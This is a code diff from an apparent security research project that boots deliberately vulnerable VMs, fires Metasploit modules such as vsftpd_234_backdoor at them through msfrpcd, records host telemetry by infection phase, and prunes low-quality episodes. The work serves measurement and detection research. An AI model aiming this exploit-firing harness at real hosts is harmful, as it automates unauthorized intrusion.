+        load1 = [(r.get("load_1m_5m_15m") or [0])[0] for r in guest_rows]
+        mem_used = [
+            ((r.get("mem_total_bytes") or 0) - (r.get("mem_available_bytes") or 0)) / (1024 * 1024)
+            for r in guest_rows
+        ]
+        panels.append(("guest load1 / mem_used (MiB)", lambda ax: (
+            ax.plot(gt, load1, color="#222222", linewidth=1.0, label="load1"),
+            ax.twinx().plot(gt, mem_used, color="#4488cc", linewidth=1.0, label="mem MiB"),
+        )))
+    n = len(panels)
+    fig, axes = plt.subplots(n, 1, figsize=(13, 2 + 1.6 * n), sharex=True)
+    if n == 1:
+        axes = [axes]
+    for ax, (ylabel, plot_fn) in zip(axes, panels):
+        plot_fn(ax)
+        ax.set_ylabel(ylabel)
+        ax.grid(alpha=0.25)
+    axes[-1].set_xlabel("time (s)")
     for ax in axes:
         for start, end, phase in spans:

364
tools/prune_episodes.py Normal file

@ -0,0 +1,364 @@
"""``cis490-prune`` — retroactively filter low-quality episodes from
the receiver's dataset.

The signals that mark an episode as low-quality:

  no-sample           meta.sample is null. Pre-Sample-propagation code
                      (commit a193d17 or earlier) ran the v1 yes-loop
                      fallback regardless of what the fleet picked, so
                      post-infection variety isn't recorded in meta.
  no-workload-events  events.jsonl has zero workload_* rows.
                      Pre-audit-trail code (commit d86502d or earlier)
                      ran with no event emission from VMLoadController,
                      so we can't tell whether the workload actually
                      fired.
  workload-failed     events.jsonl contains a workload_failed row. The
                      SerialClient.run() raised mid-phase; the labels
                      and telemetry don't match what the orchestrator
                      was supposed to be doing.
  workload-silent     A workload_killed event during the dormant phase
                      has pre_kill_probe.yes == "0", meaning no
                      ``yes``-loop process was running when we tried
                      to kill it. This is the elliott-lab fingerprint:
                      the schedule walked but nothing fired in-guest.
  flat-cpu            The spread between per-phase median /proc CPU%
                      values (max minus min) is under 5 percentage
                      points. A model trained on these episodes can't
                      distinguish phases.

Usage:
    cis490-prune                     # dry-run summary, no changes
    cis490-prune --reason no-sample  # filter to one signal
    cis490-prune --archive           # mv flagged episodes to
                                     # /var/lib/cis490/episodes-archive/
    cis490-prune --delete            # rm flagged episodes + index rows

Run this on the receiver host, where /var/lib/cis490/ lives. Run it as
root: the episode store is owned by the cis490 user with mode 0640.
"""
from __future__ import annotations
import argparse
import io
import json
import os
import shutil
import statistics
import subprocess
import sys
import tarfile
import tempfile
from dataclasses import dataclass, field
from pathlib import Path
from typing import Iterator
_REASONS = (
"no-sample",
"no-workload-events",
"workload-failed",
"workload-silent",
"flat-cpu",
)
@dataclass
class EpisodeQuality:
host_id: str
episode_id: str
tar_path: Path
size_bytes: int
reasons: list[str] = field(default_factory=list)
sample_name: str | None = None
module_name: str | None = None
@property
def fake(self) -> bool:
return bool(self.reasons)
# ---------------------------------------------------------------------------
# tarball introspection
# ---------------------------------------------------------------------------
def _read_jsonl_from_tar(tar: tarfile.TarFile, name_suffix: str) -> list[dict]:
"""Extract a JSONL member by name suffix (e.g. 'events.jsonl')."""
for m in tar.getmembers():
if m.name.endswith(name_suffix) and m.isfile():
f = tar.extractfile(m)
if f is None:
return []
text = f.read().decode("utf-8", errors="replace")
return [json.loads(line) for line in text.splitlines() if line.strip()]
return []
def _read_meta_from_tar(tar: tarfile.TarFile) -> dict:
for m in tar.getmembers():
if m.name.endswith("meta.json") and m.isfile():
f = tar.extractfile(m)
if f is None:
return {}
return json.loads(f.read().decode("utf-8"))
return {}
def _decompress_zstd(zst_path: Path) -> bytes:
    """Pure stdlib doesn't have zstd; shell out to the ``zstd`` CLI
    (already a project dep: the install scripts require it)."""
    p = subprocess.run(
        ["zstd", "-q", "-d", "--stdout", str(zst_path)],
        check=True, capture_output=True,
    )
    return p.stdout


def classify_episode(tar_zst: Path, host_id: str, episode_id: str) -> EpisodeQuality:
    """Open the tarball, scan meta + events + telemetry, return a
    quality verdict. Each signal is independent: an episode can hit
    multiple reasons (e.g. no-sample + workload-silent)."""
    q = EpisodeQuality(
        host_id=host_id,
        episode_id=episode_id,
        tar_path=tar_zst,
        size_bytes=tar_zst.stat().st_size,
    )
    try:
        raw = _decompress_zstd(tar_zst)
    except (subprocess.CalledProcessError, OSError) as e:
        q.reasons.append(f"unreadable: {e}"[:80])
        return q
    with tarfile.open(fileobj=io.BytesIO(raw)) as tar:
        meta = _read_meta_from_tar(tar)
        events = _read_jsonl_from_tar(tar, "events.jsonl")
        proc = _read_jsonl_from_tar(tar, "telemetry-proc.jsonl")
        labels = _read_jsonl_from_tar(tar, "labels.jsonl")
    sample = meta.get("sample")
    if sample is None:
        q.reasons.append("no-sample")
    else:
        q.sample_name = sample.get("name")
    exploit = meta.get("exploit")
    if exploit is not None:
        q.module_name = exploit.get("module_name")
    workload_events = [e for e in events if str(e.get("event", "")).startswith("workload_")]
    if not workload_events:
        q.reasons.append("no-workload-events")
    if any(e.get("event") == "workload_failed" for e in events):
        q.reasons.append("workload-failed")
    # workload-silent: dormant transition's probe shows no `yes` proc.
    for e in events:
        if e.get("event") != "workload_killed":
            continue
        if e.get("phase") != "dormant":
            continue
        probe = e.get("pre_kill_probe")
        if isinstance(probe, dict) and probe.get("yes") == "0":
            q.reasons.append("workload-silent")
            break
    # flat-cpu: bucket /proc CPU% by phase, check inter-phase spread.
    if proc and labels:
        clk_tck = os.sysconf("SC_CLK_TCK")

        def phase_at(t_ns: int) -> str:
            # Labels are in time order; the last one at or before t_ns wins.
            cur = "(pre)"
            for lbl in labels:
                if lbl["t_mono_ns"] <= t_ns:
                    cur = lbl["phase"]
                else:
                    break
            return cur

        per_phase: dict[str, list[float]] = {}
        prev = None
        for r in proc:
            if prev is not None:
                dt = (r["t_mono_ns"] - prev["t_mono_ns"]) / 1e9
                if dt > 0:
                    djiff = (r["cpu_user_jiffies"] + r["cpu_sys_jiffies"]) - \
                            (prev["cpu_user_jiffies"] + prev["cpu_sys_jiffies"])
                    pct = 100.0 * (djiff / clk_tck) / dt
                    per_phase.setdefault(phase_at(r["t_mono_ns"]), []).append(pct)
            prev = r
        if per_phase:
            medians = [statistics.median(v) for v in per_phase.values() if v]
            if medians and (max(medians) - min(medians)) < 5.0:
                q.reasons.append("flat-cpu")
    return q
# ---------------------------------------------------------------------------
# Index walking + actions
# ---------------------------------------------------------------------------
def walk_index(index_path: Path, episodes_root: Path) -> Iterator[tuple[dict, Path]]:
if not index_path.exists():
return
for line in index_path.read_text().splitlines():
if not line.strip():
continue
try:
row = json.loads(line)
except json.JSONDecodeError:
continue
host = row.get("host_id", "")
ep = row.get("episode_id", "")
if not host or not ep:
continue
tar = episodes_root / host / f"{ep}.tar.zst"
if not tar.exists():
continue
yield row, tar
def apply_action(
quals: list[EpisodeQuality],
*,
action: str,
archive_root: Path,
index_path: Path,
) -> None:
"""Carry out --delete or --archive on flagged episodes + drop
matching rows from index.jsonl. Atomic-ish: index rewrite is
single-shot after all tarballs are handled."""
if action not in ("delete", "archive"):
return
flagged_ids = {q.episode_id for q in quals if q.fake}
if not flagged_ids:
return
if action == "archive":
archive_root.mkdir(parents=True, exist_ok=True)
for q in quals:
if not q.fake:
continue
if action == "archive":
target = archive_root / q.host_id
target.mkdir(parents=True, exist_ok=True)
shutil.move(str(q.tar_path), target / q.tar_path.name)
elif action == "delete":
q.tar_path.unlink(missing_ok=True)
if index_path.exists():
kept = []
for line in index_path.read_text().splitlines():
try:
row = json.loads(line)
except json.JSONDecodeError:
kept.append(line)
continue
if row.get("episode_id") in flagged_ids:
continue
kept.append(line)
# Rewrite via tempfile + replace so a crash mid-write doesn't
# corrupt the live index.
tmp = index_path.with_suffix(".jsonl.partial")
tmp.write_text("\n".join(kept) + ("\n" if kept else ""))
os.replace(tmp, index_path)
# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------
def main(argv: list[str] | None = None) -> int:
p = argparse.ArgumentParser(prog="cis490-prune")
p.add_argument("--episodes-root", type=Path,
default=Path("/var/lib/cis490/episodes"))
p.add_argument("--index", type=Path,
default=Path("/var/lib/cis490/index.jsonl"))
p.add_argument("--archive-root", type=Path,
default=Path("/var/lib/cis490/episodes-archive"))
p.add_argument("--reason", action="append", choices=_REASONS,
help="Only flag episodes matching this reason. Repeat "
"to OR multiple. Default: all reasons.")
p.add_argument("--host", help="Only consider episodes from this host_id")
action = p.add_mutually_exclusive_group()
action.add_argument("--delete", action="store_true",
help="Remove flagged tarballs + drop their index rows")
action.add_argument("--archive", action="store_true",
help="Move flagged tarballs to --archive-root + drop index rows")
p.add_argument("--json", action="store_true",
help="Machine-readable output instead of summary")
args = p.parse_args(argv)
if not args.episodes_root.exists():
print(f"no episodes dir at {args.episodes_root}", file=sys.stderr)
return 2
selected_reasons = set(args.reason or _REASONS)
quals: list[EpisodeQuality] = []
for row, tar in walk_index(args.index, args.episodes_root):
if args.host and row["host_id"] != args.host:
continue
q = classify_episode(tar, row["host_id"], row["episode_id"])
# Only mark "fake" if at least one of the selected reasons hits.
q.reasons = [r for r in q.reasons if r in selected_reasons]
quals.append(q)
flagged = [q for q in quals if q.fake]
kept = [q for q in quals if not q.fake]
if args.json:
print(json.dumps({
"scanned": len(quals),
"flagged": len(flagged),
"kept": len(kept),
"by_reason": {
r: sum(1 for q in flagged if r in q.reasons) for r in _REASONS
},
"flagged_episodes": [
{
"host": q.host_id,
"episode": q.episode_id,
"size_bytes": q.size_bytes,
"reasons": q.reasons,
"sample": q.sample_name,
"module": q.module_name,
} for q in flagged
],
}, indent=2))
else:
print(f"scanned: {len(quals)} flagged: {len(flagged)} kept: {len(kept)}")
if flagged:
print()
print(f"{'host':<14} {'episode':<28} {'size':>9} reasons")
for q in flagged:
print(f"{q.host_id:<14} {q.episode_id:<28} {q.size_bytes:>9} "
f"{','.join(q.reasons)}")
if not (args.delete or args.archive):
print()
print("dry-run only. Re-run with --archive (safer) or --delete.")
    if args.delete or args.archive:
        action = "delete" if args.delete else "archive"
        apply_action(
            quals,
            action=action,
            archive_root=args.archive_root,
            index_path=args.index,
        )
        # Under --json, keep stdout parseable: send the status line to stderr.
        print(f"\n{action}d {len(flagged)} episodes",
              file=sys.stderr if args.json else sys.stdout)
    return 0 if not flagged else 1
if __name__ == "__main__":
sys.exit(main())
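
The flat-cpu signal reduces to three steps: convert consecutive jiffy counters to CPU%, bucket each value by the phase active at that sample, and compare the per-phase medians. A self-contained sketch of those steps follows. `phase_medians` and `is_flat` are hypothetical names, `clk_tck` is passed in (defaulting to 100) rather than read from `os.sysconf`, and labels are assumed to be sorted by `t_mono_ns`.

```python
import statistics


def phase_medians(proc, labels, clk_tck=100):
    """Median CPU% per phase, from cumulative jiffy counters (sketch)."""
    def phase_at(t_ns):
        cur = "(pre)"
        for lbl in labels:  # assumed sorted by t_mono_ns
            if lbl["t_mono_ns"] <= t_ns:
                cur = lbl["phase"]
            else:
                break
        return cur

    per_phase = {}
    for prev, cur in zip(proc, proc[1:]):
        dt = (cur["t_mono_ns"] - prev["t_mono_ns"]) / 1e9
        if dt <= 0:
            continue  # duplicate or out-of-order sample
        djiff = (cur["cpu_user_jiffies"] + cur["cpu_sys_jiffies"]) - (
            prev["cpu_user_jiffies"] + prev["cpu_sys_jiffies"])
        pct = 100.0 * (djiff / clk_tck) / dt
        per_phase.setdefault(phase_at(cur["t_mono_ns"]), []).append(pct)
    return {phase: statistics.median(v) for phase, v in per_phase.items()}


def is_flat(medians, threshold=5.0):
    """True when max minus min of the per-phase medians is under threshold."""
    vals = list(medians.values())
    return bool(vals) and (max(vals) - min(vals)) < threshold
```

Because the comparison is a spread over medians, an episode with a single phase always counts as flat: there is nothing to contrast it with.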

109
tools/run_fleet.py Normal file

@ -0,0 +1,109 @@
"""``cis490-fleet`` — run as many concurrent labeled episodes as the
host can handle, drawing samples from the manifest.

Modes:
    --capacity          Print the resource calculation and exit. No VMs
                        spawned.
    --waves N           Run N waves of episodes (one wave = max_concurrent
                        episodes, each in its own slot). Default: 1.
    --max-concurrent N  Cap concurrency below the auto-detected ceiling.
"""
from __future__ import annotations
import argparse
import json
import logging
import os
import signal
import sys
from pathlib import Path
# Allow running as a script.
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
from exploits.modules import load_module_configs # noqa: E402
from orchestrator.fleet import ( # noqa: E402
FleetConfig, FleetRunner, capacity_report, detect_capacity,
)
from samples.manifest import SampleManifest # noqa: E402
def main(argv: list[str] | None = None) -> int:
p = argparse.ArgumentParser(prog="cis490-fleet")
p.add_argument("--capacity", action="store_true")
p.add_argument("--waves", type=int, default=1)
p.add_argument("--max-concurrent", type=int, default=None)
p.add_argument("--manifest",
default=str(Path(__file__).resolve().parent.parent / "samples" / "manifest.toml"))
p.add_argument("--modules-dir",
default=str(Path(__file__).resolve().parent.parent / "exploits" / "modules"))
p.add_argument("--data-root", default="data")
p.add_argument("--host-id", default=os.environ.get("FLEET_HOST_ID") or os.uname().nodename)
p.add_argument("--ram-per-vm-mib", type=int, default=320)
p.add_argument("--require-real-samples", action="store_true")
p.add_argument("--force-tier2", action="store_true",
help="Skip Tier 3 even when msfrpcd is reachable")
p.add_argument("--log-level", default="INFO")
args = p.parse_args(argv)
logging.basicConfig(
level=getattr(logging, args.log_level.upper(), logging.INFO),
format="%(asctime)s %(levelname)s %(name)s %(message)s",
)
if args.capacity:
print(capacity_report())
return 0
manifest = SampleManifest.load(args.manifest)
repo_root = Path(__file__).resolve().parent.parent
modules_dir = Path(args.modules_dir)
modules = load_module_configs(modules_dir) if modules_dir.exists() else {}
cfg = FleetConfig(
host_id=args.host_id,
repo_root=repo_root,
data_root=Path(args.data_root).resolve(),
manifest=manifest,
modules=modules,
ram_per_vm_mib=args.ram_per_vm_mib,
max_concurrent_override=args.max_concurrent,
require_real_samples=args.require_real_samples,
force_tier2=args.force_tier2,
)
runner = FleetRunner(cfg)
def _stop(signum, frame): # noqa: ARG001
runner.stop()
signal.signal(signal.SIGTERM, _stop)
signal.signal(signal.SIGINT, _stop)
result = runner.run(episodes=args.waves)
print(json.dumps({
"host_id": args.host_id,
"capacity": result.capacity.to_dict(),
"modules_loaded": sorted(modules.keys()),
"slots": [
{
"slot": s.slot,
"sample": s.sample_name,
"sample_kind": s.sample_kind,
"tier": s.tier,
"module": s.module_name,
"rc": s.rc,
"duration_s": s.duration_s,
"error": s.error,
} for s in result.slots
],
"total_duration_s": result.total_duration_s,
}, indent=2))
return 0 if all(s.rc == 0 for s in result.slots) else 1
if __name__ == "__main__":
sys.exit(main())


@ -27,7 +27,9 @@ from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
sys.path.insert(0, str(Path(__file__).resolve().parent))
from collectors import qmp # noqa: E402
from orchestrator.episode import EpisodeConfig, EpisodeRunner # noqa: E402
from samples.manifest import SampleManifest # noqa: E402
from vm_load_controller import VMLoadController # noqa: E402
from vm_serial import SerialClient # noqa: E402
@ -69,7 +71,17 @@ def main() -> int:
parser.add_argument("--interval-ms", type=int, default=100)
parser.add_argument(
"--run-dir",
default="/tmp/cis490-vm",
# Per-slot defaults so the fleet runner's parallel calls don't
# collide on the same /tmp dir (which would have rmtree'd each
# other's pidfiles mid-boot — see CIS490 history). Resolution
# order:
# 1) explicit --run-dir CLI flag
# 2) RUN_DIR env (set by the fleet runner)
# 3) /tmp/cis490-vm-<SLOT> (SLOT defaults to 0)
default=(
os.environ.get("RUN_DIR")
or f"/tmp/cis490-vm-{os.environ.get('SLOT', '0')}"
),
help="QEMU run dir (sockets + pidfile go here)",
)
parser.add_argument(
@ -83,6 +95,16 @@ def main() -> int:
default=120.0,
help="how long to wait for serial login prompt",
)
parser.add_argument(
"--sample",
default=os.environ.get("SAMPLE_NAME"),
help="Pick a workload profile from the manifest by name. Fleet runner "
"passes this via SAMPLE_NAME env. If unset, runs the v1 yes-loop.",
)
parser.add_argument(
"--manifest",
default=str(Path(__file__).resolve().parent.parent / "samples" / "manifest.toml"),
)
args = parser.parse_args()
logging.basicConfig(
@ -93,6 +115,17 @@ def main() -> int:
repo_root = Path(__file__).resolve().parent.parent
launcher = repo_root / "vm" / "launch_demo.sh"
# Resolve sample if requested.
sample = None
if args.sample:
manifest = SampleManifest.load(args.manifest)
sample = next((s for s in manifest.samples if s.name == args.sample), None)
if sample is None:
log.error("sample %r not in manifest %s", args.sample, args.manifest)
return 2
log.info("using sample=%s profile=%s kind=%s",
sample.name, sample.profile, sample.kind)
run_dir = Path(args.run_dir)
# Wipe any stale sockets/pidfile from a previous run.
if run_dir.exists():
@ -137,9 +170,42 @@ def main() -> int:
serial.connect()
serial.login(boot_timeout_s=args.boot_timeout)
controller = VMLoadController(serial)
# Take a savevm AFTER the guest is fully up but BEFORE we
# start any workload. EpisodeConfig.revert_at_{start,end} use
# this snapshot for inter-episode reverts (the snapshot lives
# in the qcow2's per-VM-process overlay since launch_demo.sh
# runs with snapshot=on, so it's discarded with the VM).
# Without this step, loadvm would target a snapshot that
# doesn't exist and silently emit snapshot_revert_failed.
qmp_sock = run_dir / "qmp.sock"
if qmp_sock.exists():
try:
_qmp = qmp.QMPClient(qmp_sock)
_qmp.connect()
try:
out = _qmp.savevm("baseline-v1")
log.info("savevm baseline-v1 OK: %s", out.strip()[:160])
finally:
_qmp.close()
except Exception as e:
log.warning("savevm failed; revert_at_start unusable: %s", e)
# Bind the controller to the runner's event log so workload
# success/failure shows up alongside phase_transition events.
# Sample also goes into EpisodeConfig below so meta.sample
# records what was supposed to run.
runner_for_emit = {"runner": None}
controller = VMLoadController(
serial,
sample=sample,
emit_event=lambda ev, **kw: (
runner_for_emit["runner"].emit_event(ev, **kw)
if runner_for_emit["runner"] else None
),
)
controller.setup()
agent_sock = run_dir / "agent.sock"
cfg = EpisodeConfig(
target_pid=qemu_pid,
duration_s=sum(d for _, d in DEFAULT_SCHEDULE),
@ -148,9 +214,18 @@ def main() -> int:
phase_schedule=DEFAULT_SCHEDULE,
image_name="alpine-3.21-cloudinit",
snapshot_name="baseline-v1",
qmp_socket=qmp_sock if qmp_sock.exists() else None,
guest_agent_socket=agent_sock if agent_sock.exists() else None,
bridge_iface=os.environ.get("BRIDGE") or None,
sample=sample,
)
result = EpisodeRunner(cfg, on_phase=controller.set_phase).run()
runner = EpisodeRunner(cfg, on_phase=controller.set_phase)
# Connect the controller's event sink to the runner now that
# both exist. (Forward-reference closure pattern keeps the
# constructor argument order natural.)
runner_for_emit["runner"] = runner
result = runner.run()
controller.teardown()
serial.close()
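
The `runner_for_emit` holder above is a late-binding closure: the controller receives its emit callback before the runner exists, and the callback looks the runner up at call time. A minimal sketch with hypothetical `Controller` and `Runner` classes (stand-ins, not the project's `VMLoadController` or `EpisodeRunner`):

```python
from __future__ import annotations

from typing import Any, Callable


class Controller:
    """Hypothetical consumer that needs an emit callback at construction."""

    def __init__(self, emit: Callable[..., Any]) -> None:
        self.emit = emit


class Runner:
    """Hypothetical owner of the real event sink, constructed later."""

    def __init__(self) -> None:
        self.events: list[tuple[str, dict]] = []

    def emit_event(self, name: str, **fields: Any) -> None:
        self.events.append((name, fields))


holder: dict[str, Runner | None] = {"runner": None}


def late_emit(name: str, **fields: Any) -> None:
    # The runner is looked up when the event fires, not when this is defined.
    runner = holder["runner"]
    if runner is not None:
        runner.emit_event(name, **fields)


controller = Controller(emit=late_emit)
controller.emit("workload_setup", profile="v1-yes")  # dropped: no runner yet

holder["runner"] = Runner()
controller.emit("workload_started", phase="infected_running")  # recorded
```

One consequence to keep in mind: anything emitted before the holder is filled takes the no-op branch. In the hunk above, `controller.setup()` runs before `runner_for_emit["runner"]` is assigned, so its `workload_setup` event would appear to be dropped the same way.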

300
tools/run_tier3_demo.py Normal file

@ -0,0 +1,300 @@
"""Tier-3: real VM, real exploit, honest ``armed -> infecting`` transition.
Boots the vulnerable target VM, drives an msfrpcd-fired exploit module
against it, and lets the orchestrator's host /proc collector sample
the qemu-system pid throughout. Compared to ``run_real_vm_demo.py``:
the workload that crosses the ``armed -> infecting`` boundary is now
generated by an actual exploit landing a session, not by a script in
the guest.
Prereqs:
- vm/images/<target>.qcow2 (e.g. Metasploitable2)
- msfrpcd running locally:
msfrpcd -P <password> -U msf -a 127.0.0.1 -p 55553
- ``msgpack`` python package installed (added to runtime deps)
Run:
MSFRPC_PASSWORD=<pass> uv run python tools/run_tier3_demo.py \\
--module vsftpd_234_backdoor \\
--data-root data
"""
from __future__ import annotations
import argparse
import logging
import os
import signal
import subprocess
import sys
import time
from pathlib import Path
# Allow running as a script.
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
from collectors import qmp # noqa: E402
from exploits.driver import DriverConfig, MSFExploitDriver # noqa: E402
from exploits.modules import load_module_config # noqa: E402
from exploits.msfrpc import MSFRpcClient, MSFRpcConfig # noqa: E402
from orchestrator.episode import EpisodeConfig, EpisodeRunner # noqa: E402
from samples.manifest import SampleManifest # noqa: E402
# Same envelope shape as Tier 2 so plots are comparable. Slightly more
# armed/infecting time because real exploit fire + session establishment
# takes hundreds of ms to a few seconds.
DEFAULT_SCHEDULE = [
("clean", 10.0),
("armed", 3.0),
("infecting", 5.0),
("infected_running", 25.0),
("dormant", 15.0),
("infected_running", 20.0),
("dormant", 5.0),
("clean", 5.0),
]
def _wait_for_path(path: Path, timeout_s: float) -> None:
deadline = time.monotonic() + timeout_s
while time.monotonic() < deadline:
if path.exists() and path.read_text().strip():
return
time.sleep(0.2)
raise TimeoutError(f"{path} never appeared within {timeout_s}s")
def _wait_for_tcp(host: str, port: int, timeout_s: float) -> None:
import socket
deadline = time.monotonic() + timeout_s
last_err: Exception | None = None
while time.monotonic() < deadline:
try:
with socket.create_connection((host, port), timeout=1.0):
return
except OSError as e:
last_err = e
time.sleep(1.0)
raise TimeoutError(
f"target service {host}:{port} not reachable within {timeout_s}s "
f"(last: {last_err})"
)
def main() -> int:
parser = argparse.ArgumentParser(prog="run_tier3_demo")
parser.add_argument("--data-root", default="data")
parser.add_argument("--interval-ms", type=int, default=100)
parser.add_argument(
"--module",
default="vsftpd_234_backdoor",
help="Module config name in exploits/modules/<name>.toml",
)
parser.add_argument(
"--target-ip",
default="127.0.0.1",
help="Address the exploit module sets RHOSTS to. With the SLIRP "
"launcher (default), the guest's vulnerable port is hostfwd'd to "
"loopback; on a host-only bridge, this is the guest's bridge IP.",
)
parser.add_argument(
"--target-port",
type=int,
default=21,
help="Probe port to wait on before firing the exploit",
)
parser.add_argument(
"--run-dir",
# Per-slot defaults so the fleet runner's parallel calls don't
# collide on the same /tmp dir. See run_real_vm_demo.py for
# the same fix.
default=(
os.environ.get("RUN_DIR")
or f"/tmp/cis490-target-{os.environ.get('SLOT', '0')}"
),
help="QEMU run dir (sockets + pidfile)",
)
parser.add_argument(
"--msfrpc-host", default=os.environ.get("MSFRPC_HOST", "127.0.0.1"),
)
parser.add_argument(
"--msfrpc-port", type=int,
default=int(os.environ.get("MSFRPC_PORT", "55553")),
)
parser.add_argument(
"--msfrpc-user", default=os.environ.get("MSFRPC_USER", "msf"),
)
parser.add_argument(
"--keep-vm",
action="store_true",
help="leave the VM running after the episode finishes",
)
parser.add_argument(
"--target-boot-timeout",
type=float,
default=180.0,
help="how long to wait for the guest's vulnerable service to listen",
)
parser.add_argument(
"--sample",
default=os.environ.get("SAMPLE_NAME"),
help="Pick a workload profile from the manifest by name. Fleet runner "
"passes this via SAMPLE_NAME env. Without it, falls back to the v1 yes-loop.",
)
parser.add_argument(
"--manifest",
default=str(Path(__file__).resolve().parent.parent / "samples" / "manifest.toml"),
)
args = parser.parse_args()
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s %(levelname)s %(name)s %(message)s",
)
log = logging.getLogger("cis490.run_tier3_demo")
msfrpc_password = os.environ.get("MSFRPC_PASSWORD")
if not msfrpc_password:
log.error("MSFRPC_PASSWORD env var must be set")
return 2
repo_root = Path(__file__).resolve().parent.parent
launcher = repo_root / "vm" / "launch_target.sh"
modules_dir = repo_root / "exploits" / "modules"
module_path = modules_dir / f"{args.module}.toml"
if not module_path.exists():
log.error("no module config at %s", module_path)
return 2
module = load_module_config(module_path)
log.info("module loaded: %s (%s)", module.name, module.module_path)
sample = None
if args.sample:
manifest = SampleManifest.load(args.manifest)
sample = next((s for s in manifest.samples if s.name == args.sample), None)
if sample is None:
log.error("sample %r not in manifest %s", args.sample, args.manifest)
return 2
log.info("sample=%s profile=%s kind=%s",
sample.name, sample.profile, sample.kind)
run_dir = Path(args.run_dir)
if run_dir.exists():
import shutil
shutil.rmtree(run_dir)
run_dir.mkdir(parents=True, exist_ok=True)
pid_file = run_dir / "qemu.pid"
log.info("booting target VM via %s (RUN_DIR=%s)", launcher, run_dir)
env = os.environ.copy()
env["RUN_DIR"] = str(run_dir)
qemu = subprocess.Popen(
[str(launcher)],
cwd=str(repo_root),
env=env,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
start_new_session=True,
)
try:
_wait_for_path(pid_file, timeout_s=15.0)
qemu_pid = int(pid_file.read_text().strip())
log.info("qemu pid = %d; waiting for service on %s:%d (timeout %.0fs)",
qemu_pid, args.target_ip, args.target_port,
args.target_boot_timeout)
_wait_for_tcp(args.target_ip, args.target_port, args.target_boot_timeout)
log.info("target service is up")
# Pre-exploit savevm so EpisodeConfig.revert_at_{start,end}
# has a known-good baseline to load. Best-effort — we still
# run the episode if savevm fails (just without revert
# support). See run_real_vm_demo.py for the same pattern.
qmp_sock = run_dir / "qmp.sock"
if qmp_sock.exists():
try:
_qmp = qmp.QMPClient(qmp_sock)
_qmp.connect()
try:
out = _qmp.savevm("baseline-v1")
log.info("savevm baseline-v1 OK: %s", out.strip()[:160])
finally:
_qmp.close()
except Exception as e:
log.warning("savevm failed; revert_at_start unusable: %s", e)
client = MSFRpcClient(
MSFRpcConfig(
host=args.msfrpc_host,
port=args.msfrpc_port,
user=args.msfrpc_user,
password=msfrpc_password,
)
)
cfg = EpisodeConfig(
target_pid=qemu_pid,
duration_s=sum(d for _, d in DEFAULT_SCHEDULE),
interval_ms=args.interval_ms,
data_root=Path(args.data_root),
phase_schedule=DEFAULT_SCHEDULE,
image_name=module.name + "-target",
snapshot_name="baseline-v1",
sample=sample,
exploit_meta={
"framework": "metasploit",
"module": module.module_path,
"module_type": module.module_type,
"module_name": module.name,
"payload": module.payload_path,
"rport": module.options.get("RPORT"),
"rhost_template": module.options.get("RHOSTS"),
},
)
runner = EpisodeRunner(cfg)
driver = MSFExploitDriver(
client=client,
module=module,
cfg=DriverConfig(
target_ip=args.target_ip,
sample_store_root=repo_root / "samples" / "store",
),
emit_event=runner.emit_event,
sample=sample,
)
runner.on_phase = driver.set_phase
driver.setup()
try:
result = runner.run()
finally:
driver.teardown()
print()
print(f"episode_id = {result.episode_id}")
print(f"path = {result.episode_dir}")
print(f"rows_proc = {result.rows_proc}")
print(f"phases = {result.phases_observed}")
print(f"module = {module.module_path}")
print()
print("To plot:")
print(f" uv run python tools/plot_envelope.py {result.episode_dir}")
return 0
finally:
if not args.keep_vm:
log.info("shutting down VM (pid=%d)", qemu.pid)
try:
os.killpg(os.getpgid(qemu.pid), signal.SIGTERM)
except ProcessLookupError:
pass
try:
qemu.wait(timeout=5)
except subprocess.TimeoutExpired:
os.killpg(os.getpgid(qemu.pid), signal.SIGKILL)
if __name__ == "__main__":
sys.exit(main())
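
The `--run-dir` default above resolves in three steps: explicit flag, then `RUN_DIR`, then a per-slot path. A minimal sketch of that order as a pure function; `resolve_run_dir` is a hypothetical helper, not something the repo defines:

```python
from __future__ import annotations

from pathlib import Path
from typing import Mapping


def resolve_run_dir(
    cli_value: str | None,
    env: Mapping[str, str],
    prefix: str = "/tmp/cis490-target-",
) -> Path:
    """Hypothetical helper mirroring the --run-dir resolution order."""
    if cli_value:                       # 1) explicit --run-dir flag
        return Path(cli_value)
    if env.get("RUN_DIR"):              # 2) RUN_DIR set by the fleet runner
        return Path(env["RUN_DIR"])
    # 3) per-slot default; SLOT falls back to "0" for single-VM use
    return Path(f"{prefix}{env.get('SLOT', '0')}")
```

Passing the environment in as a mapping keeps the function testable without touching `os.environ`.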


@ -22,21 +22,63 @@ fire and a real sample.
from __future__ import annotations
import logging
import sys
from pathlib import Path
from typing import Callable
from vm_serial import SerialClient
# Allow running as a script (sibling of tools/).
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
from exploits.workloads import Workload, workload_for # noqa: E402
from samples.manifest import Sample # noqa: E402
log = logging.getLogger("cis490.vm_load_controller")
EmitEvent = Callable[..., None]
class VMLoadController:
def __init__(self, serial: SerialClient) -> None:
"""Drives a real Alpine guest through the phase schedule for
Tier 2 (no exploit). The workload is chosen by ``sample.profile``,
using the same profile catalog as the Tier-3 driver, so a fleet wave
produces matched envelopes whether or not an exploit fires.
Without a sample, falls back to the cpu-saturating yes-loop
(the original Tier-2 demo behaviour).
Every set_phase call emits an event into the runner's events.jsonl
so we can audit (a) whether the workload command was actually
sent, (b) whether the guest acknowledged it, and (c) whether the
expected process was still running when the dormant phase began.
Without those events, silent failures (partial login, command
swallowed by the tty) produce well-labeled but information-free
episodes; see CIS490 history, where every phase showed a median of
20% CPU on elliott-lab."""
def __init__(
self,
serial: SerialClient,
sample: Sample | None = None,
emit_event: EmitEvent | None = None,
) -> None:
self.s = serial
self.sample = sample
self.workload: Workload | None = workload_for(sample)
# No-op default so callers don't have to thread an emitter.
self.emit: EmitEvent = emit_event or (lambda *a, **kw: None)
def setup(self) -> None:
# Kill any pre-existing load and clear scratch space.
self._kill_load()
self.s.run("rm -f /tmp/payload /tmp/armed.log; echo setup-ok")
self.emit(
"workload_setup",
profile=self.workload.profile if self.workload else "v1-yes",
sample=self.sample.name if self.sample else None,
)
def teardown(self) -> None:
self._kill_load()
@ -44,29 +86,86 @@ class VMLoadController:
# ---- phases ---------------------------------------------------------
def set_phase(self, phase: str) -> None:
log.info("vm phase -> %s", phase)
